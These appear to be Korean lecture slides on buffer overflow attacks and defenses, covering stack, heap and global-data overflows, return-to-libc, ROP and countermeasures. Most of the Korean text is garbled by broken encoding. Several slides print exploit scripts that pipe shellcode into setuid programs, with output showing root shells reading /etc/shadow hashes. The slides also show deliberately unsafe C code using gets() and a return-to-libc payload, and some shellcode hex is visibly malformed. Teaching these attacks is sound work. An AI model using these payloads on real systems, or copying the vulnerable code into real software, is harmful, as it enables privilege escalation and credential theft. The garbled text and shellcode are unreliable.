%edx%dx%dh%dlė‚°ėˆ  ė—°ė‚°, interrupt í˜ļėķœ 및 I/O ė—°ė‚°ė— ė‚ŽėšĐ되는 data register
%ebp현ėžŽ stack frameė˜ ėĢžė†ŒëĨž 폎í•Ļ하는 base pointer
%eipė‹Ī행할 ë‹ĪėŒ 멅ë đė–īė˜ ėĢžė†ŒëĨž 폎í•Ļ하는 instruction pointer 또는 program counter
%esiëŽļėžė—ī 또는 ë°°ė—ī ė—°ė‚°ė˜ 폎ėļ터로 ė‚ŽėšĐ되는 source index register
%espStackė˜ ėĩœėƒėœ„ ėĢžė†ŒëĨž 폎í•Ļ하는 stack pointer
$ dir -l buffer4
-rwsr-xr-x 1 root knoppix 16571 Jul 17 10:49 buffer4

$ whoami
knoppix

$ cat /etc/shadow
cat: /etc/shadow: Permission denied

$ cat attack1
perl -e 'print pack("H*", 
"90909090909090909090909090909090" .
"909090e5a513c0884767d1e895e089" .
"460c0b89b83d84e8d85c5d5cd8e8e" .
"fffff6269e627a938f1fbe5e0bffb0" .
"20202020203838cffbfc0fbffbfa0");
print "whoami\n";
print "cat /etc/shadow\n";'

$ attack1 | buffer4
Enter value for name: Hello your yyyDAOApy is e?^1AFF.../bin/sh...
root: $1$rNLd4tX7$YxSna7JxH7.4JU7T419JRLrk1:13346:0:99999:7:: 
daemon:*:11453:0:99999:7:: 
...
nobody:*:11453:0:99999:7:: 
knoppix:$1$FVzSzkBU$EdSvudJkCH8Y0vIAtdnAV/:13346:0:99999:7::

Figure 10.9 Example Stack Overflow Attack

Stack Overflow Variants

  ┌──────────────────────────┐     ┌───────────────────────────┐   
  │  target program can be:  │     │    shellcode functions    │   
  └─────────────┮────────────┘     └─────────────┮─────────────┘   
                │                                │                 
┌───────────────▾──────────────┐ ┌───────────────▾────────────────┐
│ ┌──────────────────────────┐ │ │ ┌────────────────────────────┐ │
│ │ a trusted system utility │ │ │ │ launch a remote shell when │ │
│ └──────────────────────────┘ │ │ │ connected to               │ │
│ ┌──────────────────────────┐ │ │ ├────────────────────────────â”Ī │
│ │ network service daemon   │ │ │ │ create a reverse shell     │ │
│ └──────────────────────────┘ │ │ │ that connects back to the  │ │
│ ┌──────────────────────────┐ │ │ │ hacker                     │ │
│ │ commonly used library    │ │ │ ├────────────────────────────â”Ī │
│ │ code                     │ │ │ │ use local exploits that    │ │
│ └──────────────────────────┘ │ │ │ establish a shell          │ │
└──────────────────────────────┘ │ ├────────────────────────────â”Ī │
                                 │ │ flush firewall rules that  │ │
                                 │ │ currently block other      │ │
                                 │ │ attacks                    │ │
                                 │ ├────────────────────────────â”Ī │
                                 │ │ break out of a chroot      │ │
                                 │ │ (restricted execution)     │ │
                                 │ │ environment, giving full   │ │
                                 │ │ access to the system       │ │
                                 │ └────────────────────────────┘ │
                                 └────────────────────────────────┘

Buffer Overflow Defenses

        ┌────────────────────┐            
        │     two broad      │            
        │ defense approaches │            
        └─────────┮──────────┘            
         ┌────────â”ī──────────┐            
  ┌──────â”ī───────┐      ┌────â”ī─────┐      
  │ compile-time │      │ run-time │      
  └──────┮───────┘      └────┮─────┘      
┌────────â”ī─────────┐ ┌───────â”ī───────────┐
│  aim to harden   │ │ aim to detect and │
│programs to resist│ │  abort attacks in │
│  attacks in new  │ │ existing programs │
│     programs     │ └───────────────────┘
└──────────────────┘
  • Buffer overflow는 널ëĶŽ ė•…ėšĐëĻ.
  • 두 가ė§€ ęī‘ëē”ėœ„í•œ ë°Đė–ī ė ‘ę·ž ë°Đė‹
    • Compile-time: ėƒˆ 프로ę·ļëžĻė—ė„œ ęģĩęēĐė— ė €í•­í•˜ë„록 프로ę·ļëžĻė„ 강화하는 ęēƒė„ ëŠĐ표로 í•Ļ.
    • Run-time: ęļ°ėĄī 프로ę·ļëžĻė—ė„œ ęģĩęēĐė„ 탐ė§€í•˜ęģ  ėĪ‘ë‹Ļ하는 ęēƒė„ ëŠĐ표로 í•Ļ.

Compile-Time Defenses: Programming Language

  • 현대ė˜ ęģ ėˆ˜ėĪ€ ė–ļė–ī ė‚ŽėšĐ
    • Buffer overflow ęģĩęēĐė— ė·Ļė•―하ė§€ ė•ŠėŒ.
    • ėŧī파ėžëŸŽę°€ ëģ€ėˆ˜ė— 대한 ëē”ėœ„ ęē€ė‚Ž(range checks) 및 허ėšĐ 가ëŠĨ한 ė—°ė‚°ė„ 강ė œí•Ļ.
  • ë‹Ļė 
    • ęē€ė‚ŽëĨž ëķ€ęģží•˜ęļ° ėœ„í•ī ė‹Ī행 ė‹œę°„(run time)ė— ėķ”ę°€ ė―”ë“œę°€ ė‹Ī행되ė–īė•ž í•Ļ.
    • ėœ ė—°ė„ąęģž ė•ˆė „ė„ąė€ ëĶŽė†ŒėŠĪ ė‚ŽėšĐ ëđ„ėšĐė„ ėˆ˜ë°˜í•Ļ.
    • ęļ°ëģļ ęļ°ęģ„ė–ī 및 ė•„í‚Ī텍ėē˜ė™€ė˜ ęą°ëĶŽëĄœ ėļí•ī ėžëķ€ 멅ë đė–ī 및 하드ė›Ļė–ī ëĶŽė†ŒėŠĪė— 대한 ė ‘ę·žėī ė†ė‹ĪëĻ.
    • ėī럮한 ëĶŽė†ŒėŠĪė™€ ėƒí˜ļ ėž‘ėšĐí•īė•ž 하는 ėžĨėđ˜ 드띾ėīëē„ė™€ 같ė€ ė―”ë“œ ėž‘ė„ąė— ėœ ėšĐė„ąėī ė œí•œëĻ.

Compile-Time Defenses: Safe Coding Techniques

  • C ė„Īęģ„ėžë“Īė€ 타ėž… ė•ˆė „ė„ą(type safety)ëģīë‹Ī ęģĩ간 íšĻėœĻė„ąęģž ė„ąëŠĨ ęģ ë Ī ė‚Ží•­ė— í›Ļė”Ž 더 ėĪ‘ė ė„ 두ė—ˆėŒ.
    • 프로ę·ļ래ëĻļ가 ė―”ë“œ ėž‘ė„ą ė‹œ ė ė ˆí•œ ėĢžė˜ëĨž ęļ°ėšļėž ęēƒėī띞ęģ  가ė •í•Ļ.
  • 프로ę·ļ래ëĻļ는 ė―”ë“œëĨž ęē€ė‚Ží•˜ęģ  ė•ˆė „하ė§€ ė•Šė€ ė―”ë”Đė„ ë‹Īė‹œ ėž‘ė„ąí•īė•ž í•Ļ.
    • ėīė— 대한 ė˜ˆę°€ OpenBSD 프로ė íŠļėž„.
  • 프로ę·ļ래ëĻļë“Īė€ ėšīė˜ ėēīė œ, 표ėĪ€ 띞ėīëļŒëŸŽëĶŽ 및 ęģĩí†ĩ ėœ í‹ļëĶŽí‹°ëĨž 폎í•Ļ한 ęļ°ėĄī ė―”ë“œ ęļ°ë°˜ė„ 감ė‚Ž(audit)했ėŒ.
    • ėī로 ėļí•ī 널ëĶŽ ė‚ŽėšĐ되는 가ėžĨ ė•ˆė „í•œ ėšīė˜ ėēīė œ ėĪ‘ 하나로 널ëĶŽ 간ėĢžë˜ęēŒ ëĻ.

Examples of Unsafe C Code

int copy_buf(char *to, int pos, char *from, int len) {
  int i;
  
  for (i = 0; i < len; i++) {
    to[pos] = from[i];
    pos++;
  }
  return pos;
}

(a) Unsafe byte copy

short read_chunk(FILE fil, char *to) {
  short len;
  fread(&len, 2, 1, fil);   /* read length of binary data     */
  fread(to, 1, len, fil);   /* read len bytes of binary data  */
  return len;
}

(b) Unsafe byte input

Figure 10.10 Examples of Unsafe C Code

Compile-Time Defenses: Language Extensions / Safe Libraries

  • 동ė ėœžëĄœ 할ë‹đ된 ëДëŠĻëĶŽ ėē˜ëĶŽëŠ” ėŧī파ėž ė‹œę°„ė— 큎ęļ° ė •ëģīëĨž ė‚ŽėšĐ할 ėˆ˜ ė—†ėœžëŊ€ëĄœ 더 ëŽļė œę°€ ëĻ.
    • 확ėžĨėī 필ėš”하ęģ  띞ėīëļŒëŸŽëĶŽ ëĢĻí‹īė˜ ė‚ŽėšĐėī 필ėš”í•Ļ.
    • 프로ę·ļëžĻęģž 띞ėīëļŒëŸŽëĶŽëĨž ë‹Īė‹œ ėŧī파ėží•īė•ž í•Ļ.
    • 타ė‚Ž(third-party) ė• í”ŒëĶŽėž€ėīė…˜ė— ëŽļė œę°€ 발ėƒí•  가ëŠĨė„ąėī ėžˆėŒ.
  • Cė˜ ėš°ë Ī ė‚Ží•­ė€ ė•ˆė „하ė§€ ė•Šė€ 표ėĪ€ 띞ėīëļŒëŸŽëĶŽ ëĢĻí‹īė˜ ė‚ŽėšĐėž„.
    • 한 가ė§€ ė ‘ę·ž ë°Đė‹ė€ ėīęēƒë“Īė„ 더 ė•ˆė „í•œ ëģ€í˜•ėœžëĄœ 대ėēī하는 ęēƒėž„.
    • Libsafe가 ę·ļ ė˜ˆėž„.
    • 띞ėīëļŒëŸŽëĶŽëŠ” ęļ°ėĄī 표ėĪ€ 띞ėīëļŒëŸŽëĶŽëģīë‹Ī ëĻžė € 로드되도록 ė •ë Žëœ 동ė  띞ėīëļŒëŸŽëĶŽëĄœ ęĩŽí˜„ëĻ.

Compile-Time Defenses: Stack Protection

  • ė†ėƒ ė§•í›„ëĨž ėœ„í•ī stackė„ 확ėļ하는 í•Ļėˆ˜ ė§„ėž…(entry) 및 ėĒ…ëĢŒ(exit) ė―”ë“œëĨž ėķ”ę°€í•Ļ.
  • ëŽīėž‘ėœ„ canary ė‚ŽėšĐ
    • 값ė€ ė˜ˆėļĄ ëķˆę°€ëŠĨí•īė•ž í•Ļ.
    • ė‹œėŠĪ템마ë‹Ī 닮띾ė•ž í•Ļ.
  • Stackshield 및 Return Address Defender(RAD)
    • ėķ”ę°€ė ėļ í•Ļėˆ˜ ė§„ėž… 및 ėĒ…ëĢŒ ė―”ë“œëĨž 폎í•Ļ하는 GCC 확ėžĨ
    • í•Ļėˆ˜ ė§„ėž… ė‹œ 반환 ėĢžė†Œė˜ ė‚Žëģļė„ ė•ˆė „í•œ ëДëŠĻëĶŽ ė˜ė—­ė— ė”€
    • í•Ļėˆ˜ ėĒ…ëĢŒ ė―”드는 stack frameė˜ 반환 ėĢžė†ŒëĨž ė €ėžĨ된 ė‚Žëģļęģž 대ėĄ°í•˜ė—Ž 확ėļí•Ļ.
    • ëģ€ęē―ėī 발ęēŽë˜ëĐī 프로ę·ļëžĻė„ ėĪ‘ë‹Ļí•Ļ.

Run-Time Defenses: Executable Address Space Protection

  • Virtual memory ė§€ė›ė„ ė‚ŽėšĐ하ė—Ž ëДëŠĻëĶŽė˜ ėžëķ€ ė˜ė—­ė„ ė‹Ī행 ëķˆę°€ëŠĨ(non-executable)하ęēŒ 만ë“Ķ
    • ëДëŠĻëĶŽ ęī€ëĶŽ ėžĨėđ˜(MMU)ė˜ ė§€ė›ėī 필ėš”í•Ļ.
    • SPARC / Solaris ė‹œėŠĪ템ė— ė˜Ī래ė „ëķ€í„° ėĄīėžŽí–ˆėŒ.
    • x86 Linux/Unix/Windows ė‹œėŠĪ템ė—ė„œëŠ” ėĩœę·žė— 도ėž…ëĻ.
  • ëŽļė œė 
    • ė‹Ī행 가ëŠĨ한 stack ė―”ë“œė— 대한 ė§€ė›
    • íŠđëģ„í•œ ėĄ°í•­(provisions)ėī 필ėš”í•Ļ.

Run-Time Defenses: Address Space Layout Randomization (ASLR)

  • ėĢžėš” 데ėī터 ęĩŽėĄ°ė˜ ėœ„ėđ˜ëĨž ėĄ°ėž‘í•Ļ.
    • Stack, heap, ė „ė—­ 데ėī터
    • 각 process마ë‹Ī ëŽīėž‘ėœ„ shiftëĨž ė‚ŽėšĐí•Ļ.
    • 현대 ė‹œėŠĪ템ė˜ 큰 ėĢžė†Œ ëē”ėœ„는 ėžëķ€ëĨž 낭ëđ„하는 ęēƒėī ëŽīė‹œí•  ėˆ˜ ėžˆëŠ” ė˜í–Ĩė„ ëŊļėđĻė„ ė˜ëŊļí•Ļ.
  • Heap buffer ėœ„ėđ˜ė˜ ëŽīėž‘ėœ„í™”
  • 표ėĪ€ 띞ėīëļŒëŸŽëĶŽ í•Ļėˆ˜ė˜ ëŽīėž‘ėœ„ ėœ„ėđ˜

Run-Time Defenses: Guard Pages

  • ëДëŠĻëĶŽė˜ ėž„ęģ„(critical) ė˜ė—­ ė‚Žėīė— guard pagesëĨž ë°°ėđ˜í•Ļ.
    • MMUė—ė„œ ëķˆëē• ėĢžė†ŒëĄœ 플래ę·ļ ė§€ė •ëĻ.
    • ė ‘ę·ž ė‹œë„ ė‹œ process가 ėĪ‘ë‹ĻëĻ.
  • ėķ”ę°€ 확ėžĨė€ stack frameęģž heap buffer ė‚Žėīė— guard pagesëĨž ë°°ėđ˜í•Ļ.
    • 필ėš”í•œ ë‹Īėˆ˜ė˜ 페ėīė§€ ë§Ī핑ė„ ė§€ė›í•˜ęļ° ėœ„í•œ ė‹Ī행 ė‹œę°„ ëđ„ėšĐėī 발ėƒí•Ļ.

Replacement Stack Frame

  • Bufferė™€ ė €ėžĨ된 frame pointer ėĢžė†ŒëĨž ëŪė–īė“°ëŠ” ëģ€í˜•
    • ė €ėžĨ된 frame pointer 값ėī 더ëŊļ(dummy) stack frameė„ ė°ļėĄ°í•˜ë„록 ëģ€ęē―ëĻ.
    • 현ėžŽ í•Ļėˆ˜ę°€ ęĩėēī된 더ëŊļ frameėœžëĄœ 반환ëĻ.
    • ė œė–ī가 ëŪė–īė“°ė—Žė§„ bufferė˜ shellcode로 ė „ė†ĄëĻ.
  • Off-by-one ęģĩęēĐ
    • ė‚ŽėšĐ 가ëŠĨ한 ęģĩ간ëģīë‹Ī 1바ėīíŠļ 더 ëģĩė‚Žë˜ë„록 허ėšĐ하는 ė―”ë”Đ ė˜ĪëĨ˜
  • ë°Đė–ī
    • í•Ļėˆ˜ ėĒ…ëĢŒ ė―”ë“œė— ė˜í•ī stack frame 또는 반환 ėĢžė†Œė˜ ėˆ˜ė • ė‚Ží•­ė„ 탐ė§€í•˜ëŠ” ëŠĻ든 stack ëģīí˜ļ ëДėŧĪ니ėĶ˜
    • ė‹Ī행 ëķˆę°€ëŠĨ한 stack ė‚ŽėšĐ
    • ëДëŠĻëĶŽ ë‚īė˜ stack 및 ė‹œėŠĪ템 띞ėīëļŒëŸŽëĶŽė˜ ëŽīėž‘ėœ„í™”

Return to System Call

  • Stack overflow ëģ€í˜•ėœžëĄœ 반환 ėĢžė†ŒëĨž 표ėĪ€ 띞ėīëļŒëŸŽëĶŽ í•Ļėˆ˜ëĄœ 대ėēīí•Ļ.
    • ė‹Ī행 ëķˆę°€ëŠĨ한 stackė— 대한 대ė‘
  • ë°Đė–ī
    • ęģĩęēĐėžę°€ 반환 ėĢžė†Œ ėœ„ė˜ stackė— ė ė ˆí•œ 파띾ëŊļ터ëĨž ęĩŽė„ąí•Ļ.
    • í•Ļėˆ˜ę°€ 반환되ęģ  띞ėīëļŒëŸŽëĶŽ í•Ļėˆ˜ę°€ ė‹Ī행ëĻ.
    • ęģĩęēĐėžëŠ” ė •í™•í•œ buffer ėĢžė†Œę°€ 필ėš”í•  ėˆ˜ ėžˆėŒ.
    • 두 개ė˜ 띞ėīëļŒëŸŽëĶŽ í˜ļėķœė„ ė—°ęē°(chain)할 ėˆ˜ë„ ėžˆėŒ.
  • ë°Đė–ī
    • í•Ļėˆ˜ ėĒ…ëĢŒ ė―”ë“œė— ė˜í•ī stack frame 또는 반환 ėĢžė†Œė˜ ėˆ˜ė • ė‚Ží•­ė„ 탐ė§€í•˜ëŠ” ëŠĻ든 stack ëģīí˜ļ ëДėŧĪ니ėĶ˜
    • ė‹Ī행 ëķˆę°€ëŠĨ한 stack ė‚ŽėšĐ
    • ëДëŠĻëĶŽ ë‚īė˜ stack 및 ė‹œėŠĪ템 띞ėīëļŒëŸŽëĶŽė˜ ëŽīėž‘ėœ„í™”

Return-to-libc

  • ė―”ë“œ ėĢžėž… 대ė‹  ęļ°ėĄī ė―”ë“œ(ė˜ˆ: libc í•Ļėˆ˜) ė‚ŽėšĐ
    • ė˜ˆ) system(“/bin/sh”); execve (argv[0], argv, NULL);
  • Exploit ė˜ˆ
    • A * 80 + B * 4 + "\xe0\x8a\x05\x40" + "AAAA" + "\xf9\xbf\x0f\x40"
    • 0x40058ae0
    • 0x400fbff9
  • echo()가 반환될 때, system()ėī ėƒˆëĄœėšī shellė„ ė‹Ī행í•Ļ.
  • W⊕XW \oplus X ëŠĻëļ ėš°íšŒ

Heap Overflow

  • Heapė— ėœ„ėđ˜í•œ buffer ęģĩęēĐ
    • ėžë°˜ė ėœžëĄœ 프로ę·ļëžĻ ė―”ë“œ ėœ„ė— ėœ„ėđ˜í•Ļ.
    • ëДëŠĻëĶŽëŠ” 동ė  데ėī터 ęĩŽėĄ°(ė˜ˆ: 레ė―”ë“œė˜ ė—°ęē° ëĶŽėŠĪíŠļ)ė—ė„œ ė‚ŽėšĐ하ęļ° ėœ„í•ī 프로ę·ļëžĻė— ė˜í•ī ėš”ėē­ëĻ.
  • 반환 ėĢžė†Œ ė—†ėŒ.
    • 따띾ė„œ ė œė–ī ė „ė†Ąėī ė‰―ė§€ ė•ŠėŒ.
    • ė•…ėšĐ할 ėˆ˜ ėžˆëŠ” í•Ļėˆ˜ 폎ėļ터ëĨž 가ė§ˆ ėˆ˜ ėžˆėŒ.
    • 또는 ęī€ëĶŽ 데ėī터 ęĩŽėĄ°ëĨž ėĄ°ėž‘í•  ėˆ˜ ėžˆėŒ.
  • ë°Đė–ī
    • Heapė„ ė‹Ī행 ëķˆę°€ëŠĨ하ęēŒ 만ë“Īęļ°
    • Heapė˜ ëДëŠĻëĶŽ 할ë‹đ ëŽīėž‘ėœ„í™”

Heap Overflow Example

/* record type to allocate on heap */
typedef struct chunk {
    char inp[64];             /* vulnerable input buffer */
    void (*process)(char *);  /* pointer to function to process inp */
} chunk_t;

void showlen(char *buf)
{
    int len;
    len = strlen(buf);
    printf("buffer5 read %d chars\n", len);
}

int main(int argc, char *argv[])
{
    chunk_t *next;

    setbuf(stdin, NULL);
    next = malloc(sizeof(chunk_t));
    next->process = showlen;
    printf("Enter value: ");
    gets(next->inp);
    next->process(next->inp);
    printf("buffer5 done\n");
}

$ cat attack2
#!/bin/sh
# implement heap overflow against program buffer5
perl -e 'print pack("H*",
"90909090909090909090909090909090"
."8b1a5e31c08846078d1e895e0881"
."460cb00b89f38d4e08bd560ccd80e8"
."8f26f96e2f736820202020202020"
."b89704080a");
print "whoami\n";
print "cat /etc/shadow\n";
'

$ attack2 | buffer5
Enter value:
root:$1$4oImychST3RVS2F30VNRG4JUZF4o3/:13347:0:99999:7:::
daemon:*:11453:0:99999:7:::
...
nobody:*:11453:0:99999:7:::
knoppix:$1$p2wziIMLs/yVHPQuw5kvlUFJs3b9a/:13347:0:99999:7:::
...

Global Data Overflow

  • ė „ė—­ 데ėī터ė— ėœ„ėđ˜í•œ bufferëĨž ęģĩęēĐ할 ėˆ˜ ėžˆėŒ.
    • 프로ę·ļëžĻ ė―”ë“œ ėœ„ė— ėœ„ėđ˜í•  ėˆ˜ ėžˆėŒ.
    • í•Ļėˆ˜ 폎ėļ터ė™€ ė·Ļė•―한 buffer가 ėžˆëŠ” ęē―ėš°
    • 또는 ėļė ‘í•œ process ęī€ëĶŽ 테ėīëļ”
    • 나ėĪ‘ė— í˜ļėķœë˜ëŠ” í•Ļėˆ˜ 폎ėļ터ëĨž ëŪė–īė“°ëŠ” ęēƒė„ ëŠĐ표로 í•Ļ.
  • ë°Đė–ī
    • ė‹Ī행 ëķˆę°€ëŠĨ하거나 ëŽīėž‘ėœ„화된 ė „ė—­ 데ėī터 ė˜ė—­
    • í•Ļėˆ˜ 폎ėļ터 ėī동
    • Guard pages

Global Data Overflow Example

/* global static data - will be targeted for attack */
struct chunk {
    char inp[64];             /* input buffer */
    void (*process)(char *);  /* pointer to function to process it */
} chunk;

void showlen(char *buf)
{
    int len;
    len = strlen(buf);
    printf("buffer6 read %d chars\n", len);
}

int main(int argc, char *argv[])
{
    setbuf(stdin, NULL);
    chunk.process = showlen;
    printf("Enter value: ");
    gets(chunk.inp);
    chunk.process(chunk.inp);
    printf("buffer6 done\n");
}

$ cat attack3
#!/bin/sh
# implement global data overflow attack against program buffer6
perl -e 'print pack("H*",
"90909090909090909090909090909090"
."9090eb1a5e31c08846078d1e895e0889"
."460cb00b89f38d4e08bd560ccd80e8e1"
."fffff26f696e2f736820202020202020"
."409704080a");
print "whoami\n";
print "cat /etc/shadow\n";
'

$ attack3 | buffer6
Enter value:
root
root:$1$4oImychST3RVS2E3OyNRGJGUF4o3/:13347:0:99999:7:::
daemon:*:11453:0:99999:7:::
...
nobody:*:11453:0:99999:7:::
knoppix:$1$p2wziIMLs/yVHPQuw5kvlUFJs3b9a/:13347:0:99999:7:::
...

Return-Oriented Programming

  • 개념 (Concept)
  • ęģĩęēĐ ë°Đëē• (Attack method)
  • 대ė‘ėą… (Countermeasures)
  • ęģĩęēĐėžëŠ” f(“foo”)ëĨž ė‹Ī행하ęģ  ė‹ķė§€ë§Œ...
    • f()가 libcė— ė—†ėŒ.
    • 또는 f()ė˜ ėœ„ėđ˜ę°€ ëŽīėž‘ėœ„í™”ëĻ.

ROP (Return-Oriented Programming)

  • ė•…ė„ą ė―”ë“œëĨž ėĢžėž…í•  필ėš” ė—†ėī ėž„ė˜ė˜(튜링 ė™„ė „í•œ) ęģ„ė‚° ėˆ˜í–‰
    • 띞ėīëļŒëŸŽëĶŽ í•Ļėˆ˜ í˜ļėķœ 필ėš” ė—†ėŒ (ė˜ˆ: system(), execve(), ...)
    • ė›ëģļ ė―”ë“œ ėˆ˜ė • 필ėš” ė—†ėŒ.
      • 하ė§€ë§Œ ė—Žė „히 stack ë‚īėšĐ(반환 ėĢžė†Œ 폎í•Ļ)ė„ ëģ€ęē―í•īė•ž í•Ļ.
  • ROP ęģĩęēĐė€ ë‹ĪėŒ ė‹œėŠĪ템ė— ė ėšĐ될 ėˆ˜ ėžˆėŒ.
    • Intel x86 [Sha07]
    • ARM [Kor09]
    • The SPARC Machine [BRSS08]
    • Atmel AVR [FC08]
    • Z80 Voting Machines [CFK+09]
    • PowerPC [Lin09]
  • Apple iPhone
    • JailbreakMe [Hal10]
    • SMS 데ėī터ëē ėīėŠĪ 탈ė·Ļ [IW10]
  • Desktop PCs
    • Acrobat Reader [jdu10]
    • Adobe Flashplayer [Ado10]
  • íŠđėˆ˜ ëŠĐė  ęļ°ęģ„
    • Z80 voting machine [CFK+09]

General Idea of ROP

┌──────────────────────────────────────────┐
│  Seq 1      Seq 2      Seq 3      Seq 4  │
│ ┌─────┐    ┌─────┐    ┌─────┐    ┌─────┐ │
│ │ins1 │ ┌─▹│ins1 │ ┌─▹│ins1 │ ┌─▹│ins1 │ │
│ ├─────â”Ī │  ├─────â”Ī │  ├─────â”Ī │  ├─────â”Ī │
│ │ins2 │ │  │ins2 │ │  │ins2 │ │  │ins2 │ │
│ ├─────â”Ī │  ├─────â”Ī │  ├─────â”Ī │  ├─────â”Ī │
│ │ins3 │ │  │ret  │ │  │ins3 │ │  │ret  │ │
│ ├─────â”Ī │  └──┮──┘ │  ├─────â”Ī │  └─────┘ │
│ │ins4 │ │     └────┘  │ret  │ │          │
│ ├─────â”Ī │             └──┮──┘ │          │
│ │ret  │─┘                └────┘          │
│ └─────┘                                  │
└───────────────────Gadget─────────────────┘
  • ė•„ėī디ė–ī
    • (shellcode ėĢžėž…, lib í•Ļėˆ˜ í˜ļėķœ, ė―”ë“œ ėˆ˜ė • ė—†ėī) ėž„ė˜ė˜ ęģ„ė‚°ė„ ėˆ˜í–‰í•  ėˆ˜ ėžˆėŒ.
  • ė ‘ę·ž ë°Đė‹
    • ė „ėēī í•Ļėˆ˜ëĨž ė‚ŽėšĐ하는 대ė‹  ėž‘ė€ 멅ë đė–ī ė‹œí€€ėŠĪ(ė˜ˆ: libcė˜)ëĨž ė‚ŽėšĐí•Ļ.
    • 멅ë đė–ī ė‹œí€€ėŠĪ는 2 ~ 5개ė˜ 멅ë đė–ī로 ęĩŽė„ąëĻ.
    • ëŠĻ든 ė‹œí€€ėŠĪ는 ret 멅ë đė–ī로 끝ë‚Ļ.
    • 멅ë đė–ī ė‹œí€€ėŠĪ는 gadgetėœžëĄœ ė—°ęē°ëĻ.
    • Gadgetė€ íŠđė • ėž‘ė—…(ė˜ˆ: load, store, xor, branch)ė„ ėˆ˜í–‰í•Ļ.
    • ėī후, ęģĩęēĐėžëŠ” gadgetë“Īė„ ęē°í•Đ하ė—Ž ė›í•˜ëŠ” 동ėž‘ė„ 강ė œí•Ļ.

Finding unintended instruction sequences

  • libcė— ë‹ĪėŒęģž 같ė€ 멅ë đė–ī가 ėžˆë‹Īęģ  가ė •
    Byte valuesAssemblerComment
    b8 13 00 00 00mov 0x13,%eax`/* move 0x13 to the %eax register */
    e9 c3 f8 ff ffjmp 3aae9/* jump to (relative) address 3aae9 */
  • b8 대ė‹  00ëķ€í„° 바ėīíŠļ ėŠĪíŠļëĶžė„ í•īė„í•˜ëĐī, ë‹ĪėŒęģž 같ė€ ė˜ë„하ė§€ ė•Šė€ 멅ë đė–ī ė‹œí€€ėŠĪëĨž ė–ŧė„ ėˆ˜ ėžˆėŒ.
    Byte valuesAssemblerComment
    00 00add %al, (%eax)/* add register value of %al to the word pointed to by the %eax register */
    00 e9add %ch,%cl/* add registers %cl and %ch */
    c3ret/* return instruction */

Gadget Example : Memory Load (1/4)

           Stack                                                           
    ┌──────────────────┐                                                   
    │ Return Address 2 │                                                   
    ├──────────────────â”Ī                                                   
    │    0x8010AB8D    │                                                   
    ├──────────────────â”Ī                                                   
SP--▹ Return Address 1 ├──┐                                                
    ├──────────────────â”Ī  │                                                
    │     Pattern 2    │  │      Memory LOAD Gadget                        
    ├──────────────────â”Ī  │   ┌───────────────────────────────────────────┐
    │                  │  │   │  ┌────────────┐  ┌──────────────────────┐ │
    │     Pattern 1    │  └───┾──▹  pop %eax  │  │ movl 64(%eax), %eax  │ │
    │                  │      │  ├────────────â”Ī  ├──────────────────────â”Ī │
    └──────────────────┘      │  │    ret     │  │         ret          │ │
                              │  └────────────┘  └──────────────────────┘ │
                              └───────────────────────────────────────────┘
    ┌──────────────────┐                                                   
    │    0xDEADBEEF    │          Value of %eax                             
    └────────â–ē─────────┘      ┌───────────────────┐                        
             │                │ 0 0 0 0 0 0 0 0 0 │                        
        0x8010ABCD            └───────────────────┘
  • ëŠĐ표: (0x8010ABCD가 가ëĶŽí‚Ī는) ë‹Ļė–ī 0xDEADBEEFëĨž %eax registerė— 로드하ęļ°
  • Gadget ė°ūęļ° →\rightarrow BoF ęģĩęēР→\rightarrow Return →\rightarrow Sequence 1 ė‹œėž‘
    • ėž…ë Ĩ 값: Pattern 1 + Pattern 2 + Ret_addr_1 + “\x8D\xAB\x10\x80” + Ret_addr_2

Gadget Example: Memory Load (2/4)

  • 0x8010AB8DëĨž %eax registerė— pop
  • ëŠĐ표: (0x8010ABCD가 가ëĶŽí‚Ī는) ë‹Ļė–ī 0xDEADBEEFëĨž %eax registerė— 로드하ęļ°

Gadget Example: Memory Load (3/4)

  • ė œė–ī 흐ëĶ„ė€ Sequence 1ė˜ ret 멅ë đė–īė— ė˜í•ī Sequence 2로 ėī동í•Ļ.
  • ëŠĐ표: (0x8010ABCD가 가ëĶŽí‚Ī는) ë‹Ļė–ī 0xDEADBEEFëĨž %eax registerė— 로드하ęļ°

Gadget Example: Memory Load (4/4)

  • 0xDEADBEEFëĨž %eax register로 move
  • ëŠĐ표: (0x8010ABCD가 가ëĶŽí‚Ī는) ë‹Ļė–ī 0xDEADBEEFëĨž %eax registerė— 로드하ęļ°

Countermeasures

  • 반환 ėĢžė†ŒëĨž ė•…ė˜ė ėļ ėˆ˜ė •ėœžëĄœëķ€í„° ė–īë–ŧęēŒ ëģīí˜ļ할 ęēƒėļ가?
    • ėŧī파ėžëŸŽ ęļ°ë°˜ ė†”ëĢĻė…˜
      • 반환 ėĢžė†ŒëĨž ëģ„도ė˜ shadow stackė— ë°ąė—…í•Ļ.
    • 하드ė›Ļė–ī ė§€ė› ė†”ëĢĻė…˜
      • Stackė„ 데ėī터 ė „ėšĐ 및 í˜ļėķœ/반환 ėĢžė†Œ ė „ėšĐ ëķ€ëķ„ėœžëĄœ ëķ„ëĶŽí•Ļ.
      • í˜ļėķœ/반환 stackė— 대한 access controlė„ 강ė œí•Ļ.
    • JIT-compiler ęļ°ë°˜ė˜ 동ė  바ėī너ëĶŽ ęģ„ėļĄ(Dynamic binary instrumentation)
      • ė ‘ę·ž ë°Đė‹: ė‹Ī행 ė‹œę°„(runtime)ė— 멅ë đė–ī ëļ”록ė„ ėƒˆëĄœėšī 멅ë đė–ī로 ėŧī파ėží•˜ė—Ž ęģ„ėļĄ ė―”ë“œëĨž ėķ”ę°€í•Ļ (JIT – Just In Time Compilation)
    • Program shepherding
      • 반환 대ėƒėī ėœ íšĻ한 í˜ļėķœ ė‚ŽėīíŠļėļė§€ 확ėļí•Ļ, ėĶ‰ 반환ė€ call 멅ë đė–ī가 ė„ í–‰ëœ 멅ë đė–īëĨž 대ėƒėœžëĄœ í•īė•ž í•Ļ.
    • 반환 ëđˆë„ ėļĄė •
    • ROPdefender
      • ëģ„도ė˜ shadow stackė— ëģīęī€ëœ ėœ íšĻ한 반환 ėĢžė†Œė™€ 각 반환 ėĢžė†ŒëĨž 대ėĄ°í•˜ė—Ž 확ėļí•Ļ.

ROP without Returns [9]

  • íŠđė§•
    • 반환 ėĢžė†ŒëĨž ëģīí˜ļ하는 대ė‘ėą…ė„ ėš°íšŒí•  ėˆ˜ ėžˆėŒ.
    • Intel x86 및 ARM 등ė— ė ėšĐ 가ëŠĨí•Ļ.
